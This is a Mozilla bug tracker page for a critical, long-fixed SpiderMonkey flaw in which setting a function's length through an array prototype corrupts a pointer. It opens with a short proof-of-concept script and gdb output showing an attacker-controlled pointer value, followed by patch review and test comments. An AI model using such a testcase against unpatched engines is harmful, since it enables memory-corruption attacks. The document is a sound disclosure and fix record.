Closed
Bug 390598
Opened 17 years ago
Closed 17 years ago
array_length_setter() is exploitable
Categories
(Core :: JavaScript Engine, defect, P1)
Core
JavaScript Engine
Tracking
()
VERIFIED
FIXED
mozilla1.9alpha8
People
(Reporter: sync2d, Assigned: brendan)
References
Details
(Keywords: crash, regression, testcase, Whiteboard: [sg:critical] post 1.8-branch)
Attachments
(3 files, 2 obsolete files)
$ cat array-length.txt function exploit() { var fun = function () {}; fun.__proto__ = []; fun.length = 0x50505050 >> 1; fun(); } exploit(); $ dbg.obj/js array-length.txt Assertion failure: OBJ_GET_CLASS(cx, obj) == &js_ArrayClass, at jsarray.c:404 $ gdb --eval run --args opt.obj/js array-length.txt ... Program received signal SIGSEGV, Segmentation fault. js_Interpret (cx=0xaa0750, pc=0xaa3cfa ":", result=0x97ec84) at jsinterp.c:3925 3925 if (fun->flags & JSFUN_INTERPRETED) { (gdb) print fun $1 = (JSFunction *) 0x50505050
Assignee | ||
Comment 1•17 years ago
|
||
Assignee | ||
Updated•17 years ago
|
Priority: -- → P1
Target Milestone: --- → mozilla1.9 M8
Assignee | ||
Comment 2•17 years ago
|
||
Attachment #274976 -
Attachment is obsolete: true
Attachment #274978 -
Flags: review?(igor)
Attachment #274976 -
Flags: review?(igor)
Updated•17 years ago
|
Attachment #274978 -
Flags: review?(igor) → review+
Comment 3•17 years ago
|
||
Comment on attachment 274976 [details] [diff] [review] fix This is OK as a security fix.
Attachment #274976 -
Flags: review+
Comment 4•17 years ago
|
||
(In reply to comment #3) > (From update of attachment 274976 [details] [diff] [review]) > This is OK as a security fix. The problem is that function F() {} F.prototype = []; var x = new F(); x.length = 10; print(x.length); now prints 0, not 10 as required by ECMA.
Assignee | ||
Comment 5•17 years ago
|
||
(In reply to comment #4) > (In reply to comment #3) > > (From update of attachment 274976 [details] [diff] [review] [details]) > > This is OK as a security fix. > > The problem is that > > function F() {} F.prototype = []; var x = new F(); x.length = 10; > print(x.length); > > now prints 0, not 10 as required by ECMA. I thought this was an old bug, but I was wrong: $ ../src.ref/Darwin_DBG.OBJ/js js> function F() {} F.prototype = []; var x = new F(); x.length = 10; 10 js> x.length 10 Recent regression, due to bug 385393 of course. Let me try to fix it and fix this bug. /be
Assignee | ||
Comment 6•17 years ago
|
||
(My ../src.ref/ tree pre-dates last night's landings.) /be
Assignee | ||
Comment 7•17 years ago
|
||
Attachment #274978 -
Attachment is obsolete: true
Attachment #274983 -
Flags: review?(igor)
Comment 8•17 years ago
|
||
Comment on attachment 274983 [details] [diff] [review] alterna-fix 2, restores lost ECMA compat This is simple and nice workaround.
Attachment #274983 -
Flags: review?(igor) → review+
Assignee | ||
Updated•17 years ago
|
Flags: blocking1.9+
Assignee | ||
Comment 9•17 years ago
|
||
Fixed: js/src/jsarray.c 3.116 /be
Status: ASSIGNED → RESOLVED
Closed: 17 years ago
Resolution: --- → FIXED
Comment 10•17 years ago
|
||
Comment 11•17 years ago
|
||
Updated•17 years ago
|
Flags: in-testsuite+
Updated•15 years ago
|
Group: core-security
Flags: wanted1.8.1.x-
Keywords: regression
Whiteboard: [sg:critical] → [sg:critical] post 1.8-branch
Comment 13•14 years ago
|
||
test checked into 1.9.0, 1.9.1, 1.9.2, tracemonkey. 1.9.3 will get picked up in the next merge.
You need to log in
before you can comment on or make changes to this bug.
Description
•